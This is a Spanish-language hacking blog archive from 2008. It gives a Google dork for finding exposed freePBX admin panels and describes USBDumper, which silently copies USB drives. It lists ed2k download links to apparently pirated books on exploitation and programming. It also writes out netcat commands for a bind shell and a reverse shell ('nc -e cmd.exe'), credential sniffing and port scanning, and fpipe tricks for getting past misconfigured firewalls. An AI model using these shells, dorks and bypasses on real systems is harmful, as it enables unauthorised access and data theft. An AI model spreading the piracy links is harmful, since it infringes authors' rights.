Google search:
intitle:”freePBX administration” inurl:admin -ext:pdf
Archive for the ‘hack’ Category
Asterisk vulnerability with google
June 7, 2008PEID: develando estructura de ficheros sospechosos
May 21, 2008
PEiD updated description PEiD detects most common packers, cryptors and compilers for PE files and currently it can detect more than 470 different signatures in PE files. PEiD is special in some aspects when compared to other identifiers already out there! Here are some key features of “PEiD updated”: · It has a superb GUI and the interface is really intuitive and simple.
En la primera etapa del análisis
trataremos de conocer la estruc-
tura del i chero sospechoso. Para
ello nos servirá el analizador de
i cheros ejecutables PEiD. Esta
herramienta posee una base de
datos incorporada que permite de-
terminar el lenguaje utilizado para
crear una aplicación e identii car
los tipos más populares de compre-
sores y protectores de i cheros eje-
cutables. También podemos utilizar
FileInfo, un analizador de i cheros
un poco más antiguo. Sin embargo,
este último no es desarrollado tan
dinámicamente como PEiD, y el re-
sultado obtenido puede ser menos
preciso.
PEiD detects most common packers, cryptors and compilers for PE files
· Detection rates are amongst the best given by any other identifier.
· Special scanning modes for *advanced* detections of modified and unknown files.
· Shell integration, Command line support, Always on top and Drag’n'Drop capabilities.
· Multiple file and directory scanning with recursion.
· Task viewer and controller.
· Plugin Interface with plugins like Generic OEP Finder and Krypto ANALyzer.
· Extra scanning techniques used for even better detections.
· Heuristic Scanning options.
· New PE details, Imports, Exports and TLS viewers
· New built in quick disassembler.
· New built in hex viewer.
· External signature interface which can be updated by the user.
What’s New in This Release:
· Added sorting of Plugin menu items. Submenus are created based on subfolders in the directory.
· Added Brizo disassembler core. Added some more detections.
· Fixed documented and undocumented vulnerability issues.
· Fixed some general bugs.
· Removed mismatch mode scanner which needs further improvements.
USB dumper
May 10, 2008http://www.kriptopolis.org/usb-dumper
USBDumper es una pequeña utilidad capaz de correr en cualquier PC bajo Windows y que -atención- realiza una copia del contenido de cualquier llave USB que se inserte en el sistema. Para remate, es muy sencilla de utilizar y su operación es totalmente silente. Incluso existe ya una versión mejorada (USBDump2) que dispone de un interfaz gráfico y algunas funcionalidades extra aún más peligrosas (inyección de macros en documentos Word y Excel, selección de extensiones a copiar y posibilidad de arrancar automáticamente un ejecutable dado tras la inserción de una llave). Se trata de la versión que he utilizado para este artículo.
Algunas utilidades para aumentar la seguridad
May 10, 2008Algunos links sobre hack
May 7, 2008Todas las revistas de hackxcrack:
- Editora McGrall Hill
Hacking Linux Exposed
ed2k://|file|Mc%20Graw%20Hill%20-%20Hacking%20Linux%20Exposed.pdf|101736448|0864571468B4B82C5B19B0454B41D8C8|/
Referencia completa de Visual C++
ed2k://|file|Mcgraw%20Hill%20-%201998%20-%20Visual%20C++%206%20The%20Complete%20Reference.chm|3322336|815D51E6AC77C176B71009C6FF7FA6BB|/
Programacion en VHDL ( Interesantisimo )
ed2k://|file|McGraw%20Hill%20-%20VHDL%20Programming%20by%20Example%204th%20Ed.pdf|2406781|AA61FBC0D585EBE532CDC479C691F823|/
El arte de C++ ( Buenisimo, escencial para principiantes )ed2k://|file|McGraw-Hill%20-%20The%20Art%20of%20C++%20(2004)%20-%20Schildt.chm|1086579|F717FBF238CC54A817116D52C0F4AA24|/
C++ From de ground up – Edicion 2003
ed2k://|file|McGraw%20Hill%20-%20C++%20from%20the%20Ground%20Up%20(Herbert%20Schildt,%203rd,%202003).pdf|5185329|921672A030EF19651839813C28E53849|/
Administracion de un sistema Unix ( Texto para principiantes )
ed2k://|file|McGraw-Hill%20-%20UNIX%20System%20Administration%20-%20A%20Beginner’s%20Guide%20(HP-UX,%20Solaris,%20Linux)%20-%202002%20!%20-%20(By%20Laxxuss).pdf|9708543|C6B6B4DB05FAFD460676AFA49BD8BE77|/
Introduccion a Algoritmos
ed2k://|file|(ebook%20-%20PDF%20-%20Programming)%20McGraw-Hill%20-%20Introduction%20To%20Algorithms,%202nd%20Edition.pdf|13119033|66D78CE964240B90E922804D215CF72F|/
- Criptografia
Criptografia Basica
ed2k://|file|Criptografia.pdf|1001644|62838CD2B77CFE98C3209582344C8B3A|/
Fundamentos basicos de Criptologia
ed2k://|file|Criptolog%C3%ADa%20(Conceptos%20Y%20Algoritmos)%20Pdf.zip|194070|CA5D8AAFD926147ACF0D334AFDC05F67|/
Criptologia Aplicada ( Curso Interesantisimo )
ed2k://|file|Criptologia%20Aplicada.rar|5310137|B82AD8B16555F1F2E51E7F4F71293514|/
- Seguridad informatica
Buffer Overflows para Novatos
ed2k://|file|buffer_overflows_for_newbies.txt|31060|7D8B5F7F2391D8956FC80FFC29EFB4C5|/
Explotando Buffer Overflows – Ejemplos en C y Assembler
ed2k://|file|Exploiting%20Buffer-Overflows%20in%20C%20and%20Assembler.pdf|69155|55737AB48A7830D000E3B2053784A78E|/
Como escribir Buffer Overflows
ed2k://|file|How.to.write.Buffer.Overflows.pdf|23827|457F22591A7C3B339CD58D8DD4FF7582|/
Curso de seguridad informatica y Criptografia
ed2k://|file|Curso%20de%20seguridad%20inform%C3%A1tica%20y%20criptograf%C3%ADa%20v3.0.pdf|16604575|10BB6D348563AFF930CDC798D5324AC4|/
Normas de Seguridad ISO 17799
ed2k://|file|Normas%20De%20Seguridad%20Iso%2017799%20SEGURIDAD%20INFORMATICA.rar|118980|3CC38D4C1250340C4E238A44A49285C0|/
Curso de Seguridad informatica
ed2k://|file|Curso%20De%20Seguridad%20Informatica%20Sitemas%20PIRATA%20SA.zip|2969137|24341ADBEBB0DE54ECD4EA59B4EE96DB|/
El Fraude informatico
ed2k://|file|fraude%20informatico%20y%20seguridad%20informatica.pdf|296948|A448519AAE14FA3D7051F10A113B9D6A|/
Hacking Practico – ANAYA MULTIMEDIA ( Edicion 2006 )
ed2k://|file|HACKING%20PRACTICO%20(%20ANAYA%20MULTIMEDIA).PDF|103451205|2BD068F6B3AAF0F484930CD4DCC1EE81|/
Google Hacking for Penetration Testers ( Bastante Interesante )
ed2k://|file|Syngress-%20Google%20Hacking%20for%20Penetration%20Testers.pdf|33793996|EDAE45502ED00CF60AB413C5940B428A|/
Hackeando servidores SQL y Oracle
ed2k://|file|hacking%20sql%20&%20oracle%20servers.pdf|299008|1CC97E1DAE19A00665B9728D48902543|/
Inyeccion SQL – Introduccion ( Ejemplos de los errores comunes )
ed2k://|file|Hacking%20Databases%20-%20Sql%20Injection%20Attacks%20And%20Common%20Configuration%20Mistakes.rar|9322589|85A4CD30888DF3C38211E946F5311581|/
Inyeccion SQL para desarrolladores en Oracle
ed2k://|file|Hacking%20-%20An%20Introduction%20To%20Sql%20Injection%20Attacks%20For%20Oracle%20Developers%20(Ing-24P-2003).pdf|236561|3D57566C6EF0BB0FEEB7F1E452E5EBD7|/
Texto Avanzado sobre SQL Injection
ed2k://|file|Advanced%20SQL%20Injection.pdf|393037|B3174CF2220D92A7FEAC9BAFBB4CB779|/
Mas sobre SQL injection – Texto Avanzado
ed2k://|file|more_advanced_sql_injection.pdf|194985|E9F5CC972CDC0CE744E1D0873DB16AF7|/
- Ingenieria Inversa
Intro. Ingeniera Inversa
ed2k://|file|Reverse%20Engineering%20(Softice%20Cracking).pdf|686805|D9C5D79F71A368766E738EE36115DDCC|/
Curso completo sobre Ingenieria Inversa
ed2k://|file|Curso%20completo%20de%20Cracking.zip|14957416|6EBB7D5560F52D0E130771596ABB8F25|/
• Hakin9 – Abusos de las cadenas de formato
• Hakin9 – Administrado la Inseguridad Informática
• Hakin9 – Almacenamos datos confidenciales en GNU/Linux
• Hakin9 – Análisis del funcionamiento de programas sospechoso
• Hakin9 – Análisis del tráfico en red
• Hakin9 – Análisis estático del código ejecutable ELF
• Hakin9 – Anti-Sniffing, Privacidad y VPN
• Hakin9 – Ataque man-in-the-middle en Jabber
• Hakin9 – Ataques avanzados de puerta trasera en Linux
• Hakin9 – Ataques de tipo HTML injection
• Hakin9 – Automatizando el proceso de explotación en Linux x86
• Hakin9 – Blind TCP connection reset
• Hakin9 – Como se envia un Spam
• Hakin9 – Conociendo distintos tipos de protocolos
• Hakin9 – Crear el shellcode polimórfico
• Hakin9 – Criptografía 30 años despues
• Hakin9 – Criptografía de Curva Elíptica: Ataque de Rho de Pollard
• Hakin9 – Defensa contra Fingerprinting de la capa de aplicación
• Hakin9 – Desarrollo de shellcodes en Python
• Hakin9 – Desbordamiento de la pila en Linux x86
• Hakin9 – Desconfianza digital
• Hakin9 – Detectando backdoors silenciosos
• Hakin9 – El desvio de los cortafuegos de red
• Hakin9 – Empleo de errores del mecanismo de mensajes de Windows
• Hakin9 – Engañamos SPF
• Hakin9 – Evitamos cortafuegos
• Hakin9 – Google peligroso búsqueda de datos confidenciales
• Hakin9 – Hackea Windows Vista
• Hakin9 – Honeypots – Worm Traps
• Hakin9 – ICMP redirect
• Hakin9 – Introducción a las técnicas de Xpath Injection
• Hakin9 – IPS System Based on Snort
• Hakin9 – Librería libproc – Punto débil de muchos sistemas
• Hakin9 – Los ataques DDoS
• Hakin9 – Network defense
• Hakin9 – Optimización de los shellcodes en Linux
• Hakin9 – Oracle desde el punto de vista del intruso
• Hakin9 – Pharming DNS cache poisoning
• Hakin9 – Port-knocking con SendIP y TCPDump
• Hakin9 – Problemas con autenticación HTTP
• Hakin9 – SEC for Real-time Security Log Monitoring
• Hakin9 – Seguridad VoIP Protocolos SIP y RTP
• Hakin9 – Seguridad WiFi – WEP, WPA y WPA2
• Hakin9 – Seleccionadas técnicas de omitir cortafuegos
• Hakin9 – Smart Spoofing
• Hakin9 – Sniffing en redes conmutadas
• Hakin9 – SQL Injection Attacks
• Hakin9 – Trucos comerciales de los spammers
• Hakin9 – Uso impropio de Usenet
• Hakin9 – Utilizando Snort_inline
• Hakin9 – Wardriving
Netcat como sniffer
April 30, 2008Shell Remota
Obtener un Shell rapidamente en una maquina remota usando la
opcion -l (Listen) conjuntamente con la opcion -e (ejecutar) , cuando el
proggie corre con estas variables y la coneccion es realizada, NetCat
ejecuta el programa elegido y se conecta a stdin y stdout del programa
en la coneccion la red.
nc -l -p 23 xxx.xxx.xxx.xx 23 -t -e cmd.exe
Este comando dejara NetCat escuchando el Puerto 23 (telnet) ,
cuando es conectado a traves del cliente, ejecutaran una Shell (cmd.exe).
la opcion -t le dice a NetCat que maneje cualquier negociacion que el
cliente pueda esperar.
Sniffer:
Otra de las interesante posibilidades de netcat es su capacidad para
escuchar conecciones en cualquier puerto, pudiendo redireccionar todo el
trafico del mismo hacia un archivo o hacia pantalla, en este sencillo
ejemplo, podemos observar las bases de un sencillo sniffer en Windows:
C:\nc11nt>nc -v -v -L 127.0.0.1 -p 23
DNS fwd/rev mismatch: localhost != NKRA
listening on [any] 23 …
DNS fwd/rev mismatch: localhost != NKRA
connect to [127.0.0.1] from localhost [127.0.0.1] 1131
login: xxxxxx
password: yyyyyyy
Tambien podemos redireccionar toda la salida a un archivo e
irnos a realizar otras actividades ,ientras netcat hace su trabajo:
C:\nc11nt>nc -v -v -L -p 23 127.0.0.1 -t >login.txt
DNS fwd/rev mismatch: localhost != NKRA
listening on [any] 23 …
[Aqui viene la connecion.]
DNS fwd/rev mismatch: localhost != NKRA
connect to [127.0.0.1] from localhost [127.0.0.1] 1030
[Todo lo que escriba la conneccion se va al archivo login.txt]
sent 0, rcvd 42
La opcion L permite que netcat escuche nuevamente al terminar la coneccion
Scann de Puertos
Netcat puede ser utilizado como scanner, sus multiples opciones
le permiten realizar un gran numero de combinaciones, pudiendo realizar
Scannings en Puertos Random, en puertos conocidos, en modo ascendente o
descendente, con intervalos de tiempo, utilizando gateways para evitar
mostrar la IP fuente del Scanning, etc.
C:\nc11nt>nc -v -v -z 127.0.0.1 53 25 21
DNS fwd/rev mismatch: localhost != NKRA
localhost [127.0.0.1] 53 (domain): connection refused
localhost [127.0.0.1] 25 (smtp): connection refused
localhost [127.0.0.1] 21 (ftp): connection refused
sent 0, rcvd 0: NOTSOCK
Pues si; aqui tienen un pequeño y primitivo scanner, se le
puede asignarle un rango de puertos:
C:\nc11nt>nc -v -v -z 127.0.0.1 1-53
DNS fwd/rev mismatch: localhost != darkstar
localhost [127.0.0.1] 53 (domain): connection refused
localhost [127.0.0.1] 52 (?): connection refused
localhost [127.0.0.1] 51 (?): connection refused
localhost [127.0.0.1] 50 (?): connection refused
localhost [127.0.0.1] 49 (?): connection refused
localhost [127.0.0.1] 48 (?): connection refused etc…
Volvemos con la opcion v (verbose) y la Opcion z (zero i/o)
que es usada para scanning, los puertos se lo especificamos al final del
IP del host, bien sea individuales separados por un espacio; o por un
rango de puertos.
fpipe: redireccionamiento de puertos en windows
April 27, 2008d:\Tools\fpipe>fpipe –l 9080 xxx.com –r 80
De este modo, le estaremos indicando a “FPipe”, que escuche en el puerto local (-l)
9080 y redireccione su actividad a barrapunto.com en el puerto remoto (-r) 80. Una vez
que demos “Enter”, la consola quedará a la espera de conexiones (Figura 6) lista para
anunciar cualquier actividad entre los puertos e IPs intervinientes en las posibles
conexiones.
Para demostrar esto, deberemos lanzar nuevamente nuestro browser apuntando a:
http://localhost:9080 y si todo ha salido como esperamos deberíamos aparecer en el sitio
de http://xxx.com y nuestra ventana de comando debería mostrar las
direcciones entrantes y salientes respecto de nuestra redirección.
Es que por medio de su utilización,
muchas veces nos será posible atravesar firewalls mal configurados, por medio de
trucos como este:
Saltando firewall con fpipe:
d:\Tools\fpipe>fpipe –l 139 –s 88 www.target.com –r 139
Esta redirección, hará que el servidor objetivo, reciba tráfico al puerto 139, debido a que
las reglas mal configuradas sobre el firewall dispuesto delante del mismo, dejaran pasar
tráfico proveniente del puerto 88 (IPSec / Kerberos, etc) el cual considerarán lícito.
http://www.foundstone.com/us/resources-free-tools.asp
Con netcat en ocasiones tambien es psoible nat, firewalls, etc, ejemplo de tomar la linea de comandos de otra maquna por medio de conexion inversa:
client
c:\> nc -l -p 80
natted host
c:\> nc -e cmd.exe ip. 80
En este mismo blog ya hemos tratado el tema de netcat.
Seguridad informatica
April 27, 2008Hakin 9 live cd
February 25, 20081.- Las revistas: http://www.digital-system.org/comentario/revista-hackin9/1/178/
No siempre funciona la descarga en formato pdf.
2.- Los live cd: ftp://hakin9.pollub.pl/hakin9/
